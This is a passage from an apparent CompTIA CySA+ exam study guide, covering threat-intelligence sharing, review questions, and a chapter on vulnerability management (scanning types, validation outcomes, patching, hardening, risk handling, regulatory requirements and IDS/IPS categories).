information be shared with all departments that perform
various security functions. Although an organization might not
have a separate group for each of the areas covered in the
sections that follow, security professionals should ensure that
the latest threat data is made available to all functional units
that participate in these activities.
Incident Response
Incident response will be covered more completely in
Chapter 15, “The Incident Response Process,” but here it is
important to point out that properly responding to security
incidents requires knowledge of what may be occurring, and
that requires a knowledge of the very latest threats and how
those threats are realized. Therefore, members who are trained
in the incident response process should also be kept up to date
on the latest threat vectors by giving them access to all threat
intelligence that has been collected through any sharing
arrangements.
Vulnerability Management
Vulnerability management will be covered in Chapter 5,
“Vulnerabilities Associated with Specialized Technology,” and
Chapter 6, “Threats and Vulnerabilities Associated with
Operating in the Cloud,” but here it is important to point out
that there is no function that depends so heavily on shared
intelligence information as vulnerability management. When
sharing platforms and protocols are used to identify new
threats, this data must be shared in a timely manner with those
managing vulnerabilities.
Risk Management
Risk management will be addressed in Chapter 20, “Applying
Security Concepts in Support of Organizational Risk
Mitigation.” It is a formal process that rates identified
vulnerabilities by the likelihood of their compromise and the
impact of said compromise. Because this process is based on
complete and thorough vulnerability identification, speedy
sharing of any new threat intelligence is critical to the
vulnerability management process on which risk management
depends.
Security Engineering
Security engineering is the process of architecting security
features into the design of a system or set of systems. It has as
its goal an emphasis on security from the ground up, sometimes
stated as “building in security.” Unless the very latest threats are
shared with this function, engineers cannot be expected to build
in features that prevent threats from being realized.
Detection and Monitoring
Finally, those who are responsible for monitoring and detecting
attacks also benefit greatly from timely sharing of threat
intelligence data. Without this, indicators of compromise
cannot be developed and utilized to identify the new threats in
time to stop them from causing breaches.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 2-3
lists a reference of these key topics and the page number on
which each is found.
Table 2-3 Key Topics in Chapter 2
Key Topic
Element
Description
Page
Number
Section
Diamond Model
22
Figure 2-2
Kill chain
23
Bulleted list
Example indicators of
compromise
25
Bulleted list
CVSS metric groups
26
Bulleted list
Base metric group metrics
26
Bulleted list
CVSS vector readings
28
Bulleted list
Threat actors
29
Bulleted list
Example attack vectors
31
Figure 2-3
Risk assessment matrix
32
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
attack frameworks
MITRE ATT&CK
Diamond Model of Intrusion Analysis
adversary
capability
infrastructure
victim
kill chain
heuristics
indicator of compromise (IoC)
Common Vulnerability Scoring System (CVSS)
Attack Vector (AV)
Attack Complexity (AC)
Privileges Required (Pr)
Availability (A)
Confidentiality (C)
Integrity (I)
risk management
threat modeling methodology
total attack surface
incident response
threat intelligence
vulnerability management
security engineering
REVIEW QUESTIONS
1. Match each corner of the Diamond Model with its
description.
Corner
Descriptions
Adversary
Describes attacker intrusion tools and techniques
Victim
Describes the target or targets
Capability
Describes the set of systems an attacker uses to
launch attacks
Infrastruct
Describes the intent of the attack
ure
2. The _______________ corner of the Diamond Model
focuses on the intent of the attack.
3. What type of threat data describes a source that repeatedly
sends large amounts of traffic to a single IP address?
4. _________________ is any activity, artifact, or log entry
that is typically associated with an attack of some sort.
5. Give at least two examples of an IoC.
6. Match each acronym with its description
Acrony
m
Description
TLP
System of ranking vulnerabilities that are discovered
based on predefined metrics
MITR
E
ATT&
CK
Any activity, artifact, or log entry that is typically
associated with an attack of some sort
CVSS
Knowledge base of adversary tactics and techniques
based on real-world observations
IoC
Set of designations used to ensure that sensitive
information is shared with the appropriate audience
7. In the following CVSS vector, what does the Pr:L designate?
CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/C:L/I:N/A:N
8. The _________________CVSS metric group describes
characteristics of a vulnerability that are constant over time
and user environments.
9. The ____________ CVSS base metric describes how the
attacker would exploit the vulnerability.
10. Match each CVSS attack vector value with its description.
Val
ue
Description
P
Means the attack requires the attacker to physically touch or
manipulate the vulnerable component
L
Means that the attacker can cause the vulnerability from any
network
N
Means that the attacker must be on the local network
A
Means that the attacker must have physical or logical access
to the affected system
Chapter 3
Vulnerability Management
Activities
This chapter covers the following topics related to Objective 1.3
(Given a scenario, perform vulnerability management activities)
of the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Vulnerability identification: Explores asset criticality, active vs.
passive scanning, and mapping/enumeration.
Validation: Covers true positive, false positive, true negative, and
false negative alerts.
Remediation/mitigation: Describes configuration baseline,
patching, hardening, compensating controls, risk acceptance, and
verification of mitigation.
Scanning parameters and criteria: Explains risks associated
with scanning activities, vulnerability feed, scope, credentialed vs.
non-credentialed scans, server-based vs. agent-based scans,
internal vs. external scans, and special considerations including
types of data, technical constraints, workflow, sensitivity levels,
regulatory requirements, segmentation, intrusion prevention
system (IPS), intrusion detection system (IDS), and firewall
settings.
Inhibitors to remediation: Covers memorandum of
understanding (MOU), service-level agreement (SLA),
organizational governance, business process interruption,
degrading functionality, legacy systems, and proprietary systems.
Managing vulnerabilities requires more than a casual approach.
There are certain processes and activities that should occur to
ensure that your management of vulnerabilities is as robust as it
can be. This chapter describes the activities that should be
performed to manage vulnerabilities.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these five self-assessment questions, you might
want to move ahead to the “Exam Preparation Tasks” section.
Table 3-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so you that can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 3-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Vulnerability Identification
1
Validation
2
Remediation/Mitigation
3
Scanning Parameters and Criteria
4
Inhibitors to Remediation
5
1. Which of the following helps to identify the number and type
of resources that should be devoted to a security issue?
1. Specific threats that are applicable to the component
2. Mitigation strategies that could be used
3. The relative value of the information that could be discovered
4. The organizational culture
2. Which of the following occurs when the scanner correctly
identifies a vulnerability?
1. True positive
2. False positive
3. False negative
4. True negative
3. Which of the following is the first step of the patch
management process?
1. Determine the priority of the patches
2. Install the patches
3. Test the patches
4. Ensure that the patches work properly
4. Which of the following is not a risk associated with scanning
activities?
1. False sense of security can be introduced
2. Does not itself reduce your risk
3. Only as valid as the latest scanner update
4. Distracts from day-to-day operations
5. Which of the following is a document that, while not legally
binding, indicates a general agreement between the
principals to do something together?
1. SLA
2. MOU
3. ICA
4. SCA
FOUNDATION TOPICS
VULNERABILITY IDENTIFICATION
Vulnerabilities must be identified before they can be mitigated
by applying security controls or countermeasures. Vulnerability
identification is typically done through a formal process called a
vulnerability assessment, which works hand in hand with
another process called risk management. The vulnerability
assessment identifies and assesses the vulnerabilities, and the
risk management process goes a step further and identifies the
assets at risk and assigns a risk value (derived from both the
impact and likelihood) to each asset.
Regardless of the components under study (network,
application, database, etc.), any vulnerability assessment’s goal
is to highlight issues before someone either purposefully or
inadvertently leverages the issue to compromise the component.
The design of the assessment process has a great impact on its
success. Before an assessment process is developed, the
following goals of the assessment need to be identified:
The relative value of the information that could be
discovered through the compromise of the components
under assessment: This helps to identify the number and type of
resources that should be devoted to the issue.
The specific threats that are applicable to the component:
For example, a web application would not be exposed to the same
issues as a firewall because their operation and positions in the
network differ.
The mitigation strategies that could be deployed to
address issues that might be found: Identifying common
strategies can suggest issues that weren’t anticipated initially. For
example, if you were doing a vulnerability test of your standard
network operating system image, you should anticipate issues you
might find and identify what technique you will use to address each.
A security analyst who will be performing a vulnerability
assessment needs to understand the systems and devices that
are on the network and the jobs they perform. Having this
knowledge will ensure that the analyst can assess the
vulnerabilities of the systems and devices based on the known
and potential threats to the systems and devices.
After gaining knowledge regarding the systems and device, a
security analyst should examine existing controls in place and
identify any threats against those controls. The security analyst
then uses all the information gathered to determine which
automated tools to use to analyze for vulnerabilities. After the
vulnerability analysis is complete, the security analyst should
verify the results to ensure that they are accurate and then
report the findings to management, with suggestions for
remedial action. With this information in hand, the threat
analyst should carry out threat modeling to identify the threats
that could negatively affect systems and devices and the attack
methods that could be used.
In some situations, a vulnerability management system may be
indicated. A vulnerability management system is software that
centralizes and, to a certain extent, automates the process of
continually monitoring and testing the network for
vulnerabilities. Such a system can scan the network for
vulnerabilities, report them, and, in many cases, remediate the
problem without human intervention. While a vulnerability
management system is a valuable tool to have, these systems,
regardless of how sophisticated they may be, cannot take the
place of vulnerability and penetration testing performed by
trained professionals.
Keep in mind that after a vulnerability assessment is complete,
its findings are only a snapshot in time. Even if no
vulnerabilities are found, the best statement to describe the
situation is “there are no known vulnerabilities at this time.” It
is impossible to say with certainty that a vulnerability will not
be discovered in the near future.
Asset Criticality
Assets should be classified based on their value to the
organization and their sensitivity to disclosure. Assigning a
value to data and assets enables an organization to determine
the resources that should be used to protect them. Resources
that are used to protect data include personnel resources,
monetary resources, access control resources, and so on.
Classifying assets enables you to apply different protective
measures. Asset classification is critical to all systems to protect
the confidentiality, integrity, and availability (CIA) of the asset.
After assets are classified, they can be segmented based on the
level of protection needed. The classification levels ensure that
assets are protected in the most cost-effective manner possible.
The assets could then be configured to ensure they are isolated
or protected based on these classification levels. An
organization should determine the classification levels it uses
based on the needs of the organization. A number of privatesector classifications and military and government information
classifications are commonly used.
The information life cycle should also be based on the
classification of the assets. In the case of data assets,
organizations are required to retain certain information,
particularly financial data, based on local, state, or government
laws and regulations.
Sensitivity is a measure of how freely data can be handled. Data
sensitivity is one factor in determining asset criticality. For
example, a particular server stores highly sensitive data and
therefore needs to be identified as a high criticality asset. Some
data requires special care and handling, especially when
inappropriate handling could result in penalties, identity theft,
financial loss, invasion of privacy, or unauthorized access by an
individual or many individuals. Some data is also subject to
regulation by state or federal laws that require notification in
the event of a disclosure. Data is assigned a level of sensitivity
based on who should have access to it and how much harm
would be done if it were disclosed. This assignment of
sensitivity is called data classification. Criticality is a measure of
the importance of the data. Data that is considered sensitive
might not necessarily be considered critical. Assigning a level of
criticality to a particular data set requires considering the
answers to a few questions:
Will you be able to recover the data in case of disaster?
How long will it take to recover the data?
What is the effect of this downtime, including loss of public
standing?
Data is considered essential when it is critical to the
organization’s business. When essential data is not available,
even for a brief period of time, or when its integrity is
questionable, the organization is unable to function. Data is
considered required when it is important to the organization
but organizational operations would continue for a
predetermined period of time even if the data were not
available. Data is nonessential if the organization can operate
without it during extended periods of time.
Active vs. Passive Scanning
Network vulnerability scans probe a targeted system or network
to identify vulnerabilities. The tools used in this type of scan
contain a database of known vulnerabilities and identify
whether a specific vulnerability exists on each device. There are
two types of vulnerability scanning:
Passive vulnerability scanning: Passive vulnerability
scanning collects information but doesn’t take any action to block
an attack. A passive vulnerability scanner (PVS) monitors network
traffic at the packet layer to determine topology, services, and
vulnerabilities. It avoids the instability that can be introduced to a
system by actively scanning for vulnerabilities. PVS tools analyze
the packet stream and look for vulnerabilities through direct
analysis. They are deployed in much the same way as intrusion
detection systems (IDSs) or packet analyzers. A PVS can pick a
network session that targets a protected server and monitor it as
much as needed. The biggest benefit of a PVS is its capability to do
its work without impacting the monitored network. Some examples
of PVSs are the Nessus Network Monitor (formerly Tenable PVS)
and NetScanTools Pro.
Active vulnerability scanning: Active vulnerability scanning
collects information and attempts to block the attack. Whereas
passive scanners can only gather information, active vulnerability
scanners (AVSs) can take action to block an attack, such as block a
dangerous IP address. AVSs can also be used to simulate an attack
to assess readiness. They operate by sending transmissions to nodes
and examining the responses. Because of this, these scanners may
disrupt network traffic. Examples include Nessus Professional and
OpenVAS.
Regardless of whether it’s active or passive, a vulnerability
scanner cannot replace the expertise of trained security
personnel. Moreover, these scanners are only as effective as the
signature databases on which they depend, so the databases
must be updated regularly. Finally, because scanners require
bandwidth, they potentially slow the network. For best
performance, you can place a vulnerability scanner in a subnet
that needs to be protected. You can also connect a scanner
through a firewall to multiple subnets; this complicates the
configuration and requires opening ports on the firewall, which
could be problematic and could impact the performance of the
firewall.
Mapping/Enumeration
Vulnerability mapping and enumeration is the process of
identifying and listing vulnerabilities. In Chapter 2, “Utilizing
Threat Intelligence to Support Organizational Security,” you
were introduced to the Common Vulnerability Scoring System
(CVSS). A closely related concept is the Common Weakness
Enumeration (CWE), a category system for software weaknesses
and vulnerabilities. CWE organizes vulnerabilities into over 600
categories, including classes for buffer overflows, path/directory
tree traversal errors, race conditions, cross-site scripting, hardcoded passwords, and insecure random numbers. CWE is only
one of a number of enumerations that are used by Security
Content Automation Protocol (SCAP), a standard that the
security community uses to enumerate software flaws and
configuration issues. SCAP will be covered more fully in Chapter
14, “Automation Concepts and Technologies.”
VALIDATION
Scanning results are not always correct. Scanning tools can
make mistakes identifying vulnerabilities. There are four types
of results a scanner can deliver:
True positive: Occurs when the scanner correctly identifies a
vulnerability. True means the scanner is correct and positive means
it identified a vulnerability.
False positive: Occurs when the scanner identifies a vulnerability
that does not exist. False mean the scanner is incorrect and positive
means it identified a vulnerability. Lots of false positives reduces
confidence in scanning results.
True negative: Occurs when the scanner correctly determines
that a vulnerability does not exist. True means the scanner is
correct and negative means it did not identify a vulnerability.
False negative: Occurs when the scanner does not identity a
vulnerability that actually exists. False means the scanner is wrong
and negative means it did not find a vulnerability. This is worse
than a false positive because it means that a vulnerability exists that
you are unaware of.
REMEDIATION/MITIGATION
When vulnerabilities are identified, security professionals must
take steps to address them. One of the outputs of a good risk
management process is the prioritization of the vulnerabilities
and an assessment of the impact and likelihood of each. Driven
by those results, security measures (also called controls or
countermeasures) can be put in place to reduce risk. Let’s look
at some issues relevant to vulnerability mitigation.
Configuration Baseline
A baseline is a floor or minimum standard that is required. With
respect to configuration baselines, they are security
settings that are required on devices of various types. These
settings should be driven by results of vulnerability and risk
management processes.
One practice that can make maintaining security simpler is to
create and deploy standard images that have been secured with
security baselines. A security baseline is a set of configuration
settings that provide a floor of minimum security in the image
being deployed.
Security baselines can be controlled through the use of Group
Policy in Windows. These policy settings can be made in the
image and applied to both users and computers. These settings
are refreshed periodically through a connection to a domain
controller and cannot be altered by the user. It is also quite
common for the deployment image to include all of the most
current operating system updates and patches as well. This
creates consistency across devices and helps prevent security
issues caused by human error in configuration.
When a network makes use of these types of technologies, the
administrators have created a standard operating environment.
The advantages of such an environment are more consistent
behavior of the network and simpler support issues. Scans
should be performed of the systems weekly to detect changes to
the baseline.
Security professionals should help guide their organization
through the process of establishing the security baselines. If an
organization implements very strict baselines, it will provide a
higher level of security but can actually be too restrictive.
If an organization implements a very lax baseline, it will provide
a lower level of security and will likely result in security
breaches. Security professionals should understand the balance
between protecting the organizational assets and allowing users
access and should work to ensure that both ends of this
spectrum are understood.
Patching
Patch management, or patching, is often seen as a subset of
configuration management. Software patches are updates
released by vendors that either fix functional issues with or
close security loopholes in operating systems, applications, and
versions of firmware that run on network devices.
To ensure that all devices have the latest patches installed, you
should deploy a formal system to ensure that all systems receive
the latest updates after thorough testing in a non-production
environment. It is impossible for a vendor to anticipate every
possible impact a change might have on business-critical
systems in a network. The enterprise is responsible for ensuring
that patches do not adversely impact operations.
The patch management life cycle includes the following steps:
Step 1. Determine the priority of the patches and schedule
the patches for deployment.
Step 2. Test the patches prior to deployment to ensure that
they work properly and do not cause system or security
issues.
Step 3. Install the patches in the live environment.
Step 4. After the patches are deployed, ensure that they work
properly.
Many organizations deploy a centralized patch management
system to ensure that patching is deployed in a timely
manner. With this system, administrators can test and review
all patches before deploying them to the systems they affect.
Administrators can schedule the updates to occur during nonpeak hours.
Hardening
Another of the ongoing goals of operations security is to ensure
that all systems have been hardened to the extent that is
possible and still provide functionality. The hardening can be
accomplished both on physical and logical bases. From a logical
perspective:
Remove unnecessary applications.
Disable unnecessary services.
Block unrequired ports.
Tightly control the connecting of external storage devices and
media (if it’s allowed at all).
Compensating Controls
Not all vulnerabilities can be eliminated. In some cases, they
can only be mitigated. This can be done by implementing
compensating controls (also known as countermeasures or
safeguards) that compensate for a vulnerability that cannot be
completely eliminated by reducing the potential risk of that
vulnerability being exploited. Three things must be considered
when implementing a compensating control: vulnerability,
threat, and risk. For example, a good compensating control
might be to implement the appropriate access control list (ACL)
and encrypt the data. The ACL protects the integrity of the data,
and the encryption protects the confidentiality of the data.
Note
For more information on compensating controls, see
http://pcidsscompliance.net/overview/what-are-compensating-controls/.
Risk Acceptance
You learned about risk management in Chapter 2. Part of the
risk management process is deciding how to address a
vulnerability. There are several ways to react. Risk reduction is
the process of altering elements of the organization in response
to risk analysis. After an organization understands its risk, it
must determine how to handle the risk. The following four basic
methods are used to handle risk:
Risk avoidance: Terminating the activity that causes a risk or
choosing an alternative that is not as risky
Risk transfer: Passing on the risk to a third party, such as an
insurance company
Risk mitigation: Defining the acceptable risk level the
organization can tolerate and reducing the risk to that level
Risk acceptance: Understanding and accepting the level of risk
as well as the cost of damages that can occur
Verification of Mitigation
Once a threat has been remediated, you should verify that the
mitigation has solved the issue. You should also take steps to
ensure that all is back to its normal secure state. These steps
validate that you are finished and can move on to taking
corrective actions with respect to the lessons learned.
Patching: In many cases, a threat or an attack is made possible by
missing security patches. You should update or at least check for
updates for a variety of components. This includes all patches for
the operating system, updates for any applications that are running,
and updates to all anti-malware software that is installed. While you
are at it, check for any firmware update the device may require. This
is especially true of hardware security devices such as firewalls,
IDSs, and IPSs. If any routers or switches are compromised, check
for software and firmware updates.
Permissions: Many times an attacker compromises a device by
altering the permissions, either in the local database or in entries
related to the device in the directory service server. All permissions
should undergo a review to ensure that all are in the appropriate
state. The appropriate state might not be the state they were in
before the event. Sometimes you may discover that although
permissions were not set in a dangerous way prior to an event, they
are not correct. Make sure to check the configuration database to
ensure that settings match prescribed settings. You should also
make changes to the permissions based on lessons learned during
an event. In that case, ensure that the new settings undergo a
change control review and that any approved changes are reflected
in the configuration database.
Scanning: Even after you have taken all steps described thus far,
consider using a vulnerability scanner to scan the devices or the
network of devices that were affected. Make sure before you do so
that you have updated the scanner so it can recognize the latest
vulnerabilities and threats. This will help catch any lingering
vulnerabilities that might still be present.
Verify logging/communication to security monitoring: To
ensure that you will have good security data going forward, you
need to ensure that all logs related to security are collecting data.
Pay special attention to the manner in which the logs react when
full. With some settings, the log begins to overwrite older entries
with new entries. With other settings, the service stops collecting
events when the log is full. Security log entries need to be preserved.
This may require manual archiving of the logs and subsequent
clearing of the logs. Some logs make this possible automatically,
whereas others require a script. If all else fails, check the log often
to assess its state. Many organizations send all security logs to a
central location. This could be a Syslog server, or it could be a
security information and event management (SIEM) system. These
systems not only collect all the logs but also use the information to
make inferences about possible attacks. Having access to all logs
enables the system to correlate all the data from all responding
devices. Regardless of whether you are logging to a Syslog server or
a SIEM system, you should verify that all communications between
the devices and the central server are occurring without a hitch.
This is especially true if you had to rebuild the system manually
rather than restore from an image, as there would be more
opportunity for human error in the rebuilding of the device.
SCANNING PARAMETERS AND CRITERIA
Scanning is the process of using scanning tools to identity
security issues. Typical issues discovered include missing
patches, weak passwords, and insecure configurations. While
types of scanning are covered in Chapter 4, “Analyzing
Assessment Output,” let’s look at some issues and
considerations supporting the process.
Risks Associated with Scanning Activities
While vulnerability scanning is an advisable and valid process,
there are some risks to note:
A false sense of security can be introduced because scans are not
error free.
Many tools rely on a database of known vulnerabilities and are only
as valid as the latest update.
Identifying vulnerabilities does not in and of itself reduce your risk
or improve your security.
Vulnerability Feed
Vulnerability feeds are RSS feeds dedicated to the sharing of
information about the latest vulnerabilities. Subscribing to
these feeds can enhance the knowledge of the scanning team
and can keep the team abreast of the latest issues. For example,
the National Vulnerability Database is the U.S. government
repository of standards-based vulnerability management data
represented using the Security Content Automation Protocol
(SCAP) (covered in Chapter 14).
Scope
The scope of a scan defines what will be scanned and what type
of scan will be performed. It defines what areas of the
infrastructure will be scanned, and this part of the scope should
therefore be driven by where the assets of concern are located.
Limiting the scan areas helps ensure that accidental scanning of
assets and devices not under the direct control of the
organization does not occur (because it could cause legal
issues). Scope might also include times of day when scanning
should not occur.
In the OpenVAS vulnerability scanner, you can set the scope by
setting the plug-ins and the targets. Plug-ins define the scans to
be performed, and targets specify the machines. Figure 3-1
shows where plug-ins are chosen, and Figure 3-2 shows where
the targets are set.
Figure 3-1 Selecting Plug-ins in OpenVAS
Figure 3-2 Selecting Targets in OpenVAS
Credentialed vs. Non-credentialed
Another decision that needs to be made before performing a
vulnerability scan is whether to perform a credentialed scan or a
non-credentialed scans. A credentialed scan is a scan that is
performed by someone with administrative rights to the host
being scanned, while a non-credentialed scan is performed
by someone lacking these rights.
Non-credentialed scans generally run faster and require less
setup but do not generate the same quality of information as a
credentialed scan. This is because credentialed scans can
enumerate information from the host itself, whereas noncredentialed scans can only look at ports and only enumerate
software that will respond on a specific port. Credentialed
scanning also has the following benefits:
Operations are executed on the host itself rather than across the
network.
A more definitive list of missing patches is provided.
Client-side software vulnerabilities are uncovered.
A credentialed scan can read password policies, obtain a list of USB
devices, check antivirus software configurations, and even
enumerate Bluetooth devices attached to scanned hosts.
Figure 3-3 shows that when you create a new scan policy in
Nessus, one of the available steps is to set credentials. Here you
can see that Windows credentials are chosen as the type, and
the SMB account and password are set.
Figure 3-3 Setting Credentials for a Scan in Nessus
Server-based vs. Agent-based
Vulnerability scanners can use agents that are installed on the
devices, or they can be agentless. While many vendors argue
that using agents is always best, there are advantages and
disadvantages to both, as presented in Table 3-2.
Table 3-2 Server-Based vs. Agent-Based Scanning
Type
Agen
t
base
d
Technolo
gy
Pull
technol
ogy
Characteristics
Can get information from disconnected
machines or machines in the DMZ
Ideal for remote locations that have limited
bandwidth
Less dependent on network connectivity
Based on policies defined on the central
console
Serve
r
base
d
Push
technol
ogy
Good for networks with plentiful
bandwidth
Dependent on network connectivity
Central authority does all the scanning and
deployment
Some scanners can do both agent-based and server-based
scanning (also called agentless or sensor-based scanning). For
example, Figure 3-4 shows the Nessus templates library with
both categories of templates available.
Figure 3-4 Nessus Template Library
Internal vs. External
Scans can be performed from within the network perimeter or
from outside the perimeter. This choice has a big effect on the
results and their interpretation. Typically the type of scan is
driven by what the tester is looking for. If the tester’s area of
interest is vulnerabilities that can be leveraged from outside the
perimeter to penetrate the perimeter, then an external scan is
in order. In this type of scan, either the sensors of the appliance
are placed outside the perimeter or, in the case of software
running on a device, the device itself is placed outside the
perimeter.
On the other hand, if the tester’s area of interest is
vulnerabilities that exist within the perimeter—that is,
vulnerabilities that could be leveraged by outsiders who have
penetrated the perimeter or by malicious insiders (your own
people)—then an internal scan is indicated. In this case,
either the sensors of the appliance are placed inside the
perimeter or, in the case of software running on a device, the
device itself is placed inside the perimeter.
Special Considerations
Just as the requirements of the vulnerability management
program were defined in the beginning of the process, scanning
criteria must be settled upon before scanning begins. This will
ensure that the proper data is generated and that the conditions
under which the data will be collected are well understood. This
will result in a better understanding of the context in which the
data was obtained and better analysis. Some of the criteria that
might be considered are described in the following sections.
Types of Data
The types of data with which you are concerned should have an
effect on how you run the scan. Many tools offer the capability
to focus on certain types of vulnerabilities that relate specifically
to certain data types.
Technical Constraints
In some cases the scan will be affected by technical constraints.
Perhaps the way in which you have segmented the network
caused you to have to run the scan multiple times from various
locations in the network. You will also be limited by the
technical capabilities of the scan tool you use.
Workflow
Workflow can also influence the scan. You might be limited to
running scans at certain times because it negatively affects
workflow. While security is important it isn’t helpful if it
detracts from business processes that keep the organization in
business.
Sensitivity Levels
Scanning tools have sensitivity level settings that impact both
the number of results and the tool’s judgment of the results.
Most systems assign a default severity level to each
vulnerability. In some cases, security analysts may find that
certain events that the system is tagging as vulnerabilities are
actually not vulnerabilities but that the system has
mischaracterized them. In other cases, an event might be a
vulnerability but the severity level assigned is too extreme or
not extreme enough. In that case the analyst can either dismiss
the vulnerability, which means the system stops reporting it, or
manually define a severity level for the event that is more
appropriate. Keep in mind that these systems are not perfect.
Sensitivity also refers to how deeply a scan probes each host.
Scanning tools have templates that can be used to perform
certain types of scans. These are two of the most common
templates in use:
Discovery scans: These scans are typically used to create an asset
inventory of all hosts and all available services.
Assessment scans: These scans are more comprehensive than
discovery scans and can identify misconfigurations, malware,
application settings that are against policy, and weak passwords.
These scans have a significant impact on the scanned device.
Figure 3-5 shows the All Templates page in Nessus, with
scanning templates like the ones just discussed.
Figure 3-5 Scanning Templates in Nessus
Regulatory Requirements
Does the organization operate in an industry that is regulated?
If so, all regulatory requirements must be recorded, and the
vulnerability assessment must be designed to support all
requirements. The following are some examples of industries in
which security requirements exist:
Finance (for example, banks and brokerages)
Medical (for example, hospitals, clinics, and insurance companies)
Retail (for example, credit card and customer information)
Legislation such as the following can affect organizations
operating in these industries:
Sarbanes-Oxley Act (SOX): The Public Company Accounting
Reform and Investor Protection Act of 2002, more commonly
known as the Sarbanes-Oxley Act (SOX), affects any organization
that is publicly traded in the United States. It controls the
accounting methods and financial reporting for the organizations
and stipulates penalties and even jail time for executive officers who
fail to comply with its requirements.
Health Insurance Portability and Accountability Act
(HIPAA): HIPAA, also known as the Kennedy-Kassebaum Act,
affects all healthcare facilities, health insurance companies, and
healthcare clearing houses. It is enforced by the Office of Civil
Rights (OCR) of the Department of Health and Human Services
(HHS). It provides standards and procedures for storing, using, and
transmitting medical information and healthcare data. HIPAA
overrides state laws unless the state laws are stricter. This act
directly affects the security of protected health information (PHI).
Gramm-Leach-Bliley Act (GLBA) of 1999: The GrammLeach-Bliley Act (GLBA) of 1999 affects all financial institutions,
including banks, loan companies, insurance companies, investment
companies, and credit card providers. It provides guidelines for
securing all financial information and prohibits sharing financial
information with third parties. This act directly affects the security
of personally identifiable information (PII).
Payment Card Industry Data Security Standard (PCI DSS):
PCI DSS v3.2.1, developed in 2019, is the latest version of the PCI
DSS standard as of this writing. It encourages and enhances
cardholder data security and facilitates the broad adoption of
consistent data security measured globally. Table 3-3 shows a highlevel overview of the PCI DSS standard.
Table 3-3 High-Level Overview of PCI DSS
Build and Maintain
a Secure Network
and Systems
1. Install and maintain a firewall
configuration to protect cardholder
data
2. Do not use vendor-supplied defaults
for system passwords and other
security parameters
Protect Cardholder
Data
3. Protect stored cardholder data
4. Encrypt transmission of cardholder
data across open, public networks
Maintain a
Vulnerability
Management
Program
5. Protect all systems against malware
and regularly update antivirus
software or programs
6. Develop and maintain secure
systems and applications
Implement Strong
Access Control
Measures
7. Restrict access to cardholder data by
business need to know
8. Identify and authenticate access to
system components
9. Restrict physical access to
cardholder data
Regularly Monitor
and Test Networks
10. Track and monitor all access to
network resources and cardholder
data
11. Regularly test security systems and
processes
Maintain an
Information
Security Policy
12. Maintain a policy that addresses
information security for all
personnel
Segmentation
Segmentation is the process of dividing a network at either
Layer 2 or Layer 3. When VLANs are used, there is
segmentation at both Layer 2 and Layer 3, and with IP subnets,
there is segmentation at Layer 3. Segmentation is usually done
for one or both of the following reasons:
To create smaller, less congested subnets
To create security borders
In either case, segmentation can affect how you conduct a
vulnerability scan. By segmenting critical assets and resources
from less critical systems, you can restrict the scan to the
segments of interest, reducing the time to conduct a scan while
reducing the amount of irrelevant data. This is not to suggest
that you should not scan the less critical parts of the network;
it’s just that you can adopt a less robust schedule for those
scans.
Intrusion Prevention System (IPS), Intrusion Detection System
(IDS), and Firewall Settings
The settings that exist on the security devices will impact the
scan and in many cases are the source of a technical restraint, as
mentioned earlier. Scans might be restricted by firewall settings
and the scan can cause alerts to be generated by your intrusion
devices. Let’s talk a bit more about these devices.
Vulnerability scanners are not the only tools used to identify
vulnerabilities. The following systems should also be
implemented as a part of a comprehensive solution.
IDS/IPS
While you can use packet analyzers to manually monitor the
network for issues during environmental reconnaissance, a less
labor-intensive and more efficient way to detect issues is
through the use of intrusion detection systems (IDSs) and
intrusion prevention systems (IPSs). An IDS is responsible for
detecting unauthorized access or attacks against systems and
networks. It can verify, itemize, and characterize threats from
outside and inside the network. Most IDSs are programmed to
react in certain ways in specific situations. Event notification
and alerts are crucial to an IDS. They inform administrators and
security professionals when and where attacks are detected. IDS
implementations are furthered divided into the following
categories:
Signature based: This type of IDS analyzes traffic and compares
it to attack or state patterns, called signatures, that reside within the
IDS database. An IDS is also referred to as a misuse-detection
system. Although this type of IDS is very popular, it can only
recognize attacks as compared with its database and is only as
effective as the signatures provided. Frequent database updates are
necessary. There are two main types of signature-based IDSs:
Pattern matching: The IDS compares traffic to a database of
attack patterns. The IDS carries out specific steps when it detects
traffic that matches an attack pattern.
Stateful matching: The IDS records the initial operating
system state. Any changes to the system state that specifically
violate the defined rules result in an alert or notification being
sent.
Anomaly-based: This type of IDS analyzes traffic and compares it
to normal traffic to determine whether said traffic is a threat. It is
also referred to as a behavior-based, or profile-based, system. The
problem with this type of system is that any traffic outside expected
norms is reported, resulting in more false positives than you see
with signature-based systems. There are three main types of
anomaly-based IDSs:
Statistical anomaly-based: The IDS samples the live
environment to record activities. The longer the IDS is in
operation, the more accurate the profile that is built. However,
developing a profile that does not have a large number of false
positives can be difficult and time-consuming. Thresholds for
activity deviations are important in this IDS. Too low a threshold
results in false positives, whereas too high a threshold results in
false negatives.
Protocol anomaly-based: The IDS has knowledge of the
protocols it will monitor. A profile of normal usage is built and
compared to activity.
Traffic anomaly-based: The IDS tracks traffic pattern
changes. All future traffic patterns are compared to the sample.
Changing the threshold reduces the number of false positives or
negatives. This type of filter is excellent for detecting unknown
attacks, but user activity might not be static enough to effectively
implement this system.
Rule or heuristic based: This type of IDS is an expert system
that uses a knowledge base, an inference engine, and rule-based
programming. The knowledge is configured as rules. The data and
traffic are analyzed, and the rules are applied to the analyzed traffic.
The inference engine uses its intelligent software to “learn.” When
characteristics of an attack are met, they trigger alerts or
notifications. This is often referred to as an IF/THEN, or expert,
system.
An application-based IDS is a specialized IDS that analyzes
transaction log files for a single application. This type of IDS is
usually provided as part of an application or can be purchased
as an add-on.
An IPS is a system responsible for preventing attacks. When an
attack begins, an IPS takes actions to contain the attack. An IPS,
like an IDS, can be network or host based. Although an IPS can
